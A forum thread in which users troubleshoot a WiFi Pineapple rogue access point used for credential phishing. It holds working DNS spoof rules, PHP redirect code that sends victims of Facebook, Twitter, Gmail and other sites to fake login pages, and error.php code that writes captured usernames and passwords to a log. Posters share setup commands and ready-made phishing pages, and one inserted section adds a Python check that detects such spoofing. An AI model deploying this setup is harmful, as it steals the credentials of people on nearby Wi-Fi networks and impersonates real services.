WIFI Pineapple phishing help


So I just received my Pineapple Mark IV recently and was trying to set up phishing and rick roll on it, but I'm having some problems.

I set up phishing through these instructions:

  • I started off by formatting a USB drive with the ext4 filesystem and following the tutorial to create symbolic links to www.
  • I placed the phishing files on the flash drive and deleted the original redirect.php since we are using the new phishing one. Updated the DNS spoof area with "172.16.42.1 *". I also went into configuration and renamed the SSID to "PineApples" with the persistent box check-marked, then started the DNS spoof.

The problem: I can see the SSID on my Android phone, a Motorola Razr. I connect to it, type in either twitter.com or facebook.com, and the pineapple will successfully bring me to the facebook.html or twitter.html pages. When I connect through my laptop, however (which is the computer I have been using to set up the pineapple), whenever I type facebook.com or twitter.com into the URL box it seems to get stuck at www.facebook.com/redirect.php. I am looking at a blank page and nothing happens. I have tried disconnecting the Ethernet to the pineapple and connecting only via Wi-Fi and vice versa, with the same results.

If this is not confusing enough, I then introduced a 3rd desktop computer. This 3rd computer did not see the "PineApples" SSID, only "other network". I clicked other network and then, when asked for the network name, put in "PineApples" and successfully connected. When trying to pull up facebook.com or twitter.com I get the same "twitter.com/redirect.php" problem, where it loads a blank page and doesn't advance the page to twitter.html. So I type "facebook.com/facebook.html" into the URL box and the pineapple introduces the facebook phishing page! Continuing my troubleshooting, I type twitter.com into the URL box. It hits the redirect and I am again presented with facebook.com/facebook.html?? Well, then I type twitter.com/twitter.html. Success!! If only for 2 seconds, when it redirected back to facebook.com/facebook.html.

Well, I then try it again on my laptop connected to the pineapple over Wi-Fi. I try the URLs twitter.com and facebook.com, only to be redirected to a blank page with redirect.php in the URL box. So this time I first try to go to twitter.com/twitter.html. Now it goes to the phishing page, then redirects back to facebook.com/redirect??

What am I doing wrong??

At some point I set up the Nyan cat and rick roll redirect and got those both working with no problems on all 3 clients. But whenever I try the phishing I seem to run into the redirect problem. What am I doing wrong??

Web Browser: Firefox 17.0.1

Pineapple: Mark IV

Laptop OS: Windows 7 64 bit

Desktop OS: Windows 7 32 bit

Android OS: 4.1.2

If I have left any details out please let me know and I will add them.

Thanks for the quick reply. I tried that setting and am still getting the same errors. Plus, now I am also getting where the URL automatically changes to "https://www.facebook.com" and then times out. If I try twitter it seems to redirect back to facebook and time out, or it times out at https://twitter.com

My desktop is still acting the same however and continually redirecting to facebook.com/facebook.html

So if I go to facebook.com or twitter.com I get stuck on redirect pages. Even after clearing all cache, if I go to twitter.com I get redirected to facebook.com/redirect.php with a blank page.

Here is what my redirect.php looks like:

<?php
$ref = $_SERVER['HTTP_REFERER'];

if (strpos($ref, "facebook"))
    { header('Location: facebook.html'); }
if (strpos($ref, "twitter"))
    { header('Location: twitter.html'); }
require('error.php');
?>

Now if I change line 8, "require('error.php');", to an HTML page of my choosing, "require('twitter.html');", I won't get stuck at redirect.php; instead it loads twitter.html and keeps the appropriate URL "*.com/redirect.php".

Any clues????

Here is my error.php:

<?php
$ref = $_SERVER['HTTP_REFERER'];
$today = date("F j, Y, g:i a");
if (isset($_POST['name']) && !empty($_POST['name'])) {
    $nam = stripslashes($_POST['name']);
    $pas = stripslashes($_POST['pass']);
    $nam = htmlspecialchars($nam, ENT_QUOTES);
    $pas = htmlspecialchars($pas, ENT_QUOTES);
    $content = $today . "  --  " . $ref . "  --  " . $nam . "  --  " . $pas;
    $filed = @fopen("/pineapple/logs/phish.log", "a+");
    @fwrite($filed, "$content\n");
    @fclose($filed);
}
?>
<html><head>
<script type="text/javascript">
function goBack()
{
window.history.back()
}
</script>
</head>
<body onload="goBack()">
</body></html>

and index.php

<html>
<head>
<meta http-equiv="REFRESH" content="0;url=redirect.php">
</head>
<body>
</body>
</html>
Edited by wireless router

  • 4 weeks later...

Looks like you got some pineapple weirdness going on. First of all, check that the redirect.php file has the correct names for the files it's pointing to. { header('Location: twitter.html'); In this example, make sure twitter ends in .html or .htm, depending on the HTML file for twitter. So if the file ends in .htm, use .htm in the redirect.php file. Your redirect.php, error.php, and index.php files look OK so far. The best thing to do is to reflash the pineapple and use ccleaner on all the computers. Clear out the browser's cache before trying the phishing pages. Also, the twitter and facebook files from that download are very old. I created some new ones and more: netflix, outlook, hotmail, blogger, youtube, instagram, etc. Have fun and use them responsibly.

Link: redacted

I have run into an unexpected issue while following the YouTube tutorial.

Everything goes well and I follow the tutorial step by step without any errors. But my problem arises when I activate dnsspoof: it doesn't seem to redirect anyone going from facebook, blogger, twitter to my pineapple. But if I go on my other computer and in my URL type "172.16.42.1/facebook.htm" or "172.16.42.1/twitter.htm" and so on, I get the page like I should. I enter my credentials and the pineapple records them in the log.

What's wrong with my dnsspoof? Because clearly everything else is working except that, and I have done nothing different from the video.

I have reflashed, factory reset the pineapple, and uninstalled and reinstalled dnsspoof.

What am I missing?

Any and all help is greatly appreciated.

Did you try and clean out the computer's cache using ccleaner? Browsers cache stuff and you need to clean it out. If you followed it step by step it should work. Did you try and do a clean flash of the pineapple? If not, here are the video tutorials.

1.

2.

Edited by TylerCPU
I did a clean flash of the 2.7.5 firmware, not over serial though.

I cleared all the history and cookies from my browser. I even downloaded and ran ccleaner like you suggested, and opened up a command prompt and flushed my DNS cache.

But still nothing. I start dnsspoof and on my other computer I, for example, type "www.facebook.com" and it takes me to the real website every time, not just facebook but all sites.

But if I type, say, 172.16.42.1/facebook.htm in my browser, it takes me to that facebook page set up on the pineapple, where I can enter my credentials and it is recorded.

I do not understand why this is not working.

Sorry guys. I should have spotted it. Actually @wireless router, your redirect.php file is wrong. You're missing $_SERVER['REQUEST_URI'];. I didn't notice it until I stumbled upon this forum: http://forums.hak5.org/index.php?/topic/28599-phishing-redirect-script-not-doing-its-job/ Your redirect.php file should look like this.

<?php
$ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];

if (strpos($ref, "example")){
    header('Location: example.html');
}

require('error.php');
?>

That's what mine looks like. Hope that helps.

Edited by TylerCPU
Is my redirect.php OK? It's the one I downloaded from the advanced phishing tutorial and replaced it with the redirect.php that was on the pineapple:

<?php
$ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];

if (strpos($ref, "hotmail")){
    header('Location: hotmail.htm');
}
if (strpos($ref, "facebook")){
    header('Location: facebook.htm');
}
if (strpos($ref, "twitter")){
    header('Location: twitter.htm');
}
if (strpos($ref, "gmail")){
    header('Location: gmail.htm');
}
if (strpos($ref, "youtube")){
    header('Location: youtube.htm');
}
if (strpos($ref, "vimeo")){
    header('Location: vimeo.htm');
}
if (strpos($ref, "linkedin")){
    header('Location: linkedin.htm');
}
if (strpos($ref, "instagram")){
    header('Location: instagram.html');
}
if (strpos($ref, "plus.google")){
    header('Location: googleplus.htm');
}
if (strpos($ref, "netflix")){
    header('Location: netflix.htm');
}
if (strpos($ref, "ustream")){
    header('Location: ustream.htm');
}
if (strpos($ref, "dropbox")){
    header('Location: dropbox.htm');
}
if (strpos($ref, "blogger")){
    header('Location: blogger.htm');
}
if (strpos($ref, "outlook")){
    header('Location: outlook.htm');
}

require('error.php');
?>

SNIP

If you followed my advanced phishing tutorial it should work just fine. Your redirect.php file seems to be OK. I retested my tutorial on my pineapple and it works just fine. If you are running firmware version 2.7.5, get rid of it. It's only for Latest Development testing. Go back and reflash the pineapple to 2.7.0, which I am running and which works fine on my pineapple. That is the current Latest Stable Version. Hope that helps.

@SystemCrash86

I got it figured out. I know why you are getting this problem. I wanted to see if I did something different than you. So I reflashed my pineapple and followed my tutorial to the tee and it worked fine, just as usual. Then it hits me! You type in www.facebook.com but I only type in facebook.com. I never use the www, and when I try and go to www.facebook.com, I go to the real site. Just like your problem. So I went and edited the DNS Spoof Config. So with 172.16.42.1 facebook I also include 172.16.42.1 *.facebook.com. Now when you go to "www.facebook.com" you go to the phishing site. Go redownload my dnsspoof.txt file in the description of my YouTube video, "Advanced Phishing on the Wi-Fi Pineapple IV". Your problem, like mine, should be gone. Now you can target sites like facebook.com without forcing all DNS traffic to go to the pineapple.

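Seen from a client on the network, the two DNS spoof configurations discussed in this thread (the catch-all "172.16.42.1 *" entry and the targeted "*.facebook.com" entries) leave different traces in resolver answers. The check below is an added example, not part of any post: the function names, the canary hostname and the sample answers are constructed for illustration, and the base-domain split is a simplification.

```python
import ipaddress

# Address ranges that a public site should never resolve to. 172.16.42.1, the
# address used in the thread's DNS spoof entries, falls inside 172.16.0.0/12.
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16")]

# Hypothetical canary: a name under the reserved .invalid TLD never exists, so
# any answer for it means the resolver answers every query (the "*" entry).
CANARY = "canary-7f3a9c1e.invalid"

# Constructed resolver answers (name -> A records). The public addresses are
# documentation-range placeholders, not the sites' real addresses.
CATCH_ALL = {"www.facebook.com": ["172.16.42.1"], "twitter.com": ["172.16.42.1"],
             "example.org": ["172.16.42.1"], CANARY: ["172.16.42.1"]}
TARGETED = {"www.facebook.com": ["172.16.42.1"], "twitter.com": ["203.0.113.20"],
            "example.org": ["198.51.100.7"], CANARY: []}
CLEAN = {"www.facebook.com": ["203.0.113.10"], "twitter.com": ["203.0.113.20"],
         "example.org": ["198.51.100.7"], CANARY: []}


def is_local(addr):
    """True if addr lies in a private, loopback or link-local range."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in LOCAL_NETS)


def base_domain(name):
    # Assumption: last two labels; a real tool would use the Public Suffix List.
    return ".".join(name.rstrip(".").lower().split(".")[-2:])


def check_dns_answers(answers, canary=CANARY, min_domains=3):
    """Return (kind, subject, detail) findings; an empty list means no signs."""
    findings = []
    # A name that cannot exist was answered: the resolver answers everything.
    if answers.get(canary):
        findings.append(("canary-resolved", canary, answers[canary]))
    by_ip = {}
    for name in sorted(answers):
        if name == canary:
            continue
        # A public site answered with a local address (catches targeted entries).
        local = [a for a in answers[name] if is_local(a)]
        if local:
            findings.append(("public-name-to-local-ip", name, local))
        for addr in answers[name]:
            by_ip.setdefault(addr, set()).add(base_domain(name))
    # Unrelated domains collapsing onto a single address.
    for addr in sorted(by_ip):
        if len(by_ip[addr]) >= min_domains:
            findings.append(("many-domains-one-ip", addr, sorted(by_ip[addr])))
    return findings


if __name__ == "__main__":
    for label, sample in (("catch-all", CATCH_ALL), ("targeted", TARGETED), ("clean", CLEAN)):
        print(label, check_dns_answers(sample))
```

The targeted configuration is the harder one to spot: the canary stays unanswered, so only the local-address check fires.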

I created symbolic links to everything in the www folder except for redirect.php, error.php and index.php.

Tyler: I updated the DNS spoof config with your new txt file, and also placed your new redirect.php in the www folder. Again, there are symbolic links to all the actual spoof pages and associated folders (facebook, twitter, etc.) on the USB, but no symbolic links to redirect.php, error.php and index.php, which are only in the www folder. Should I put these pages on the USB and create symbolic links to them as well?

When I try to go to a spoofed page, www.facebook.com for instance, I get a rapid oscillation between redirect.php and the page I'm trying to go to (i.e. facebook).

You put symbolic links in the /usb folder? What you need to do is put all the phishing files in the /usb folder and make links in the /www/ folder that point to the /usb folder. Not the other way around. Leave the redirect.php, error.php, and index.php files in the /www/ folder. There should be no rapid oscillation between redirect.php and the page you're trying to go to. The easiest way to fix this is to start fresh. Re-flash the pineapple and follow this. And clear out your browser's cache before using the phishing files. You can use ccleaner if you want.

No, the symbolic links are only in the www folder on the pineapple ... pointing to the real files in the 'phish' folder on the USB.

After transferring your files to usb/phish, I ran the command:

ln -s /usb/phish/* /www/

which created the symbolic links in the www folder. The only files I put in usb/phish were the files that were in your phishing.zip file, nothing else. In other words, redirect.php, error.php and index.php are the actual files in the www folder on the pineapple. They do not exist on the usb and there are no links to them in the www folder pointing to the usb/phish folder since they're not on the usb. Should I redo the process and add the redirect.php, error.php and index.php files to the usb/phish folder as well, and then reinvoke the command to create the symbolic links?

Btw, I just updated to firmware 2.7.7, if that makes a difference.

I just updated Tyler's redirect.php with the additional 'header('Status: 302 Found');' line. OK, now this is working, or at least it's getting to the page. The URL appears as:

www.facebook.com/facebook.htm

as it should. But now I'm getting the error in my browser

'Forbidden. You don't have permission to access /facebook.htm on this server'

So apparently this is a permissions/chmod problem. If I'm not mistaken I have to SSH in to change the permissions, correct?

EDIT: if I host the actual spoof files in the www folder on the pineapple, I do not get this error.

EDIT2: Ok, running the command chmod -R 777 /usb/phish seemed to do the job nicely. I can now load all spoofed pages residing on the usb.

Edited by Zephyr
Yes, that looks like a permissions problem. That's one of the reasons I don't use bleeding edge firmware. I stay on the stable versions, which right now is 2.7.0. It's less hassle. I'm glad you got it working.

Oh sorry. The way you worded your sentence sounded like that. Anyways, I only use stable versions of the firmware. Go back to 2.7.0, but since you got it fixed you don't need to. This is why I don't use bleeding edge firmware. It has problems. Again, I'm glad you got it fixed.

Edited by TylerCPU
Tyler, that is simply not true. 2.7.7 is the next stable candidate the way it looks. It will move to 2.8.0 very soon..

The permission issue is on the usb and NOT on the pineapple ;)

Either the permissions didn't copy over properly or the permissions in the .zip are not set properly - I am assuming the first.

Best,

Sebkinne
